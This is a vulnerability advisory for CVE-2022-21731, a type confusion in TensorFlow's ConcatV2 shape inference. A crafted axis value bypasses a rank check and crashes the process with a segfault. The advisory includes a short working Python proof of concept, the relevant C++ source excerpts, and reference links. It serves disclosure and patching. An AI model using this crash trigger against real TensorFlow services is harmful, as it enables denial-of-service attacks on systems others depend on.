CVE-2022-21731: Type confusion leading to segfault in Tensorflow
(updated )
The implementation of shape inference for ConcatV2
can be used to trigger a denial of service attack via a segfault caused by a type confusion:
import tensorflow as tf
@tf.function
def test():
y = tf.raw_ops.ConcatV2(
values=[[1,2,3],[4,5,6]],
axis = 0xb500005b)
return y
test()
The axis
argument is translated into concat_dim
in the ConcatShapeHelper
helper function. Then, a value for min_rank
is computed based on concat_dim
. This is then used to validate that the values
tensor has at least the required rank:
int64_t concat_dim;
if (concat_dim_t->dtype() == DT_INT32) {
concat_dim = static_cast<int64_t>(concat_dim_t->flat<int32>()(0));
} else {
concat_dim = concat_dim_t->flat<int64_t>()(0);
}
// Minimum required number of dimensions.
const int min_rank = concat_dim < 0 ? -concat_dim : concat_dim + 1;
// ...
ShapeHandle input = c->input(end_value_index - 1);
TF_RETURN_IF_ERROR(c->WithRankAtLeast(input, min_rank, &input));
However, WithRankAtLeast
receives the lower bound as a 64-bits value and then compares it against the maximum 32-bits integer value that could be represented:
Status InferenceContext::WithRankAtLeast(ShapeHandle shape, int64_t rank,
ShapeHandle* out) {
if (rank > kint32max) {
return errors::InvalidArgument("Rank cannot exceed kint32max");
}
// ...
}
Due to the fact that min_rank
is a 32-bits value and the value of axis
, the rank
argument is a negative value, so the error check is bypassed.
References
- github.com/advisories/GHSA-m4hf-j54p-p353
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2022-55.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2022-110.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/framework/common_shape_fns.cc
- github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/framework/shape_inference.cc
- github.com/tensorflow/tensorflow/commit/08d7b00c0a5a20926363849f611729f53f3ec022
- github.com/tensorflow/tensorflow/security/advisories/GHSA-m4hf-j54p-p353
- nvd.nist.gov/vuln/detail/CVE-2022-21731
Detect and mitigate CVE-2022-21731 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →